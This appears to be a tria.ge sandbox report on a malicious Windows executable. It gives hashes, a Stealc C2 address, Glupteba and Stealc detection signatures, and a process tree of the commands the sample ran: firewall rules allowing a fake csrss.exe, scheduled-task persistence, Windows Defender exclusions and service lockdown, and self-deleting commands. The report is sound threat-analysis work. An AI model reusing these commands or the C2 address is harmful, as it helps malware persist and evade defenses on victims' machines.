Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    106s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/03/2024, 02:57

General

  • Target

    da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe

  • Size

    4.0MB

  • MD5

    e3255b216748070e4bc397405fdf6fad

  • SHA1

    aac9ba5c1a98faa2f03a20cc39b6afdb72f3a2d4

  • SHA256

    da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6

  • SHA512

    949edc571c1a944b1ce872611842ee5f9a27cda3d349207b48a57f318d31643bc514bec62cb81e0365ce58c10a4fb2b0ea26e745b013760be2d8b28768f38a2d

  • SSDEEP

    49152:/FL8Xf6qIED5X0MJEJsaoSo5dqqlg+egF0ty6H4NhGKjmuU5JN:69n4ojqV00Z

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.145

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 21 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Detect binaries embedding considerable number of MFA browser extension IDs. 4 IoCs
  • Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 4 IoCs
  • Detects Windows executables referencing non-Windows User-Agents 19 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 3 IoCs
  • Detects executables (downlaoders) containing URLs to raw contents of a paste 1 IoCs
  • Detects executables Discord URL observed in first stage droppers 19 IoCs
  • Detects executables containing URLs to raw contents of a Github gist 19 IoCs
  • Detects executables containing artifacts associated with disabling Widnows Defender 19 IoCs
  • Detects executables packed with VMProtect. 7 IoCs
  • Detects executables referencing many varying, potentially fake Windows User-Agents 19 IoCs
  • UPX dump on OEP (original entry point) 16 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 12 IoCs
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 14 IoCs
  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe
    "C:\Users\Admin\AppData\Local\Temp\da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
      2⤵
        PID:2016
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        2⤵
          PID:2376
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          2⤵
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2068
          • C:\Users\Admin\Pictures\UNAhnkHQ34vsYuu3ggHNYRmg.exe
            "C:\Users\Admin\Pictures\UNAhnkHQ34vsYuu3ggHNYRmg.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3376
            • C:\Users\Admin\AppData\Local\Temp\u2ls.0.exe
              "C:\Users\Admin\AppData\Local\Temp\u2ls.0.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4724
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe"
                5⤵
                  PID:3196
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    6⤵
                      PID:4988
                    • C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe
                      "C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe"
                      6⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1540
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe
                        7⤵
                          PID:5472
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 2.2.2.2 -n 1 -w 3000
                            8⤵
                            • Runs ping.exe
                            PID:5460
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 2776
                      5⤵
                      • Program crash
                      PID:832
                  • C:\Users\Admin\AppData\Local\Temp\u2ls.1.exe
                    "C:\Users\Admin\AppData\Local\Temp\u2ls.1.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:5084
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                      5⤵
                        PID:2960
                        • C:\Windows\SysWOW64\chcp.com
                          chcp 1251
                          6⤵
                            PID:4756
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                            6⤵
                            • Creates scheduled task(s)
                            PID:5148
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 1148
                        4⤵
                        • Program crash
                        PID:1164
                    • C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe
                      "C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4948
                      • C:\Users\Admin\AppData\Local\Temp\is-NDRQ9.tmp\BOValDiVDjiQWzr6UN6p6jA7.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-NDRQ9.tmp\BOValDiVDjiQWzr6UN6p6jA7.tmp" /SL5="$8022E,1634197,54272,C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:436
                        • C:\Users\Admin\AppData\Local\djEdit\djedit.exe
                          "C:\Users\Admin\AppData\Local\djEdit\djedit.exe" -i
                          5⤵
                          • Executes dropped EXE
                          PID:4336
                        • C:\Users\Admin\AppData\Local\djEdit\djedit.exe
                          "C:\Users\Admin\AppData\Local\djEdit\djedit.exe" -s
                          5⤵
                          • Executes dropped EXE
                          PID:2608
                    • C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe
                      "C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:428
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5180
                      • C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe
                        "C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"
                        4⤵
                        • Executes dropped EXE
                        • Checks for VirtualBox DLLs, possible anti-VM trick
                        • Suspicious behavior: EnumeratesProcesses
                        PID:6072
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          5⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3964
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            6⤵
                              PID:3044
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                            5⤵
                              PID:4864
                              • C:\Windows\system32\netsh.exe
                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                6⤵
                                • Modifies Windows Firewall
                                PID:3708
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                                PID:836
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                5⤵
                                  PID:5656
                            • C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe
                              "C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1124
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1832
                              • C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe
                                "C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:6032
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 268
                                  5⤵
                                  • Program crash
                                  PID:5280
                            • C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe
                              "C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3308
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2760
                              • C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe
                                "C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:6016
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 264
                                  5⤵
                                  • Program crash
                                  PID:5324
                            • C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe
                              "C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3664
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:216
                              • C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe
                                "C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"
                                4⤵
                                • Executes dropped EXE
                                • Checks for VirtualBox DLLs, possible anti-VM trick
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                PID:6040
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  5⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5928
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                  5⤵
                                    PID:3860
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      6⤵
                                        PID:3664
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                        6⤵
                                        • Modifies Windows Firewall
                                        PID:5864
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      5⤵
                                        PID:3264
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        5⤵
                                          PID:5456
                                        • C:\Windows\rss\csrss.exe
                                          C:\Windows\rss\csrss.exe
                                          5⤵
                                            PID:6056
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              6⤵
                                                PID:5772
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                6⤵
                                                • Creates scheduled task(s)
                                                PID:2848
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /delete /tn ScheduledUpdate /f
                                                6⤵
                                                  PID:4024
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  6⤵
                                                    PID:4804
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -nologo -noprofile
                                                    6⤵
                                                      PID:3372
                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                      6⤵
                                                        PID:5520
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          7⤵
                                                            PID:5872
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          6⤵
                                                          • Creates scheduled task(s)
                                                          PID:836
                                                        • C:\Windows\windefender.exe
                                                          "C:\Windows\windefender.exe"
                                                          6⤵
                                                            PID:2076
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                              7⤵
                                                                PID:1288
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                  8⤵
                                                                  • Launches sc.exe
                                                                  PID:4860
                                                      • C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe
                                                        "C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3636
                                                        • C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
                                                          C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Drops file in Windows directory
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4020
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            C:\Windows\system32\rundll32.exe
                                                            5⤵
                                                              PID:4120
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe
                                                              5⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5076
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1784
                                                                6⤵
                                                                • Program crash
                                                                PID:1488
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe
                                                              5⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5004
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 1780
                                                                6⤵
                                                                • Program crash
                                                                PID:5868
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe
                                                              5⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2084
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1788
                                                                6⤵
                                                                • Program crash
                                                                PID:5672
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe
                                                              5⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5220
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1760
                                                                6⤵
                                                                • Program crash
                                                                PID:5492
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe
                                                              5⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4452
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1744
                                                                6⤵
                                                                • Program crash
                                                                PID:5212
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe
                                                              5⤵
                                                                PID:3564
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 1780
                                                                  6⤵
                                                                  • Program crash
                                                                  PID:3528
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\system32\rundll32.exe
                                                                5⤵
                                                                  PID:3708
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 1760
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:3296
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  C:\Windows\system32\rundll32.exe
                                                                  5⤵
                                                                    PID:5148
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1776
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3324
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\system32\rundll32.exe
                                                                    5⤵
                                                                      PID:5900
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 1784
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:4392
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe"
                                                                    4⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:5028
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping 127.0.0.1 -n 3
                                                                      5⤵
                                                                      • Runs ping.exe
                                                                      PID:2848
                                                                • C:\Users\Admin\Pictures\P3JBDfWsxH7gfXrVpC5Da95h.exe
                                                                  "C:\Users\Admin\Pictures\P3JBDfWsxH7gfXrVpC5Da95h.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:2604
                                                                  • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:2368
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 1016
                                                                      5⤵
                                                                      • Program crash
                                                                      PID:4532
                                                                  • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5216
                                                                • C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
                                                                  "C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe" --silent --allusers=0
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Enumerates connected drives
                                                                  PID:2472
                                                                  • C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
                                                                    C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2c4,0x2f4,0x6d8e21f8,0x6d8e2204,0x6d8e2210
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:212
                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JVj1qEtdxsUSRfq6lUYWP1us.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JVj1qEtdxsUSRfq6lUYWP1us.exe" --version
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:5256
                                                                  • C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
                                                                    "C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2472 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240319025827" --session-guid=f8168227-ec23-42ba-bff5-53ea2b045c13 --server-tracking-blob=ZTIxMWE3YjdhYzEwYzZiYWIwMzFlNzE0ZDliNjMwOWE3OTczMTQ4NGYxZWQwMWVjNWE5MTc3NWYyMzZmNzI2Mjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDgxNzA2Ny41OTc0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI2ZmZjODdmZC1mODczLTQyNzEtYWQ5YS1mMTc1MTM4N2ExYjUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=AC05000000000000
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Enumerates connected drives
                                                                    PID:5440
                                                                    • C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
                                                                      C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e0,0x2e4,0x2f4,0x2bc,0x2f8,0x6a6721f8,0x6a672204,0x6a672210
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:5544
                                                                • C:\Users\Admin\Pictures\vedpmmRXAXSZuq7UqKOIe4r1.exe
                                                                  "C:\Users\Admin\Pictures\vedpmmRXAXSZuq7UqKOIe4r1.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:5336
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS7FBA.tmp\Install.exe
                                                                    .\Install.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:4484
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8855.tmp\Install.exe
                                                                      .\Install.exe /DDfBFdidvhHni "385118" /S
                                                                      5⤵
                                                                      • Checks BIOS information in registry
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops file in System32 directory
                                                                      • Enumerates system info in registry
                                                                      PID:5408
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                        6⤵
                                                                          PID:4988
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                            7⤵
                                                                              PID:5664
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                8⤵
                                                                                  PID:2116
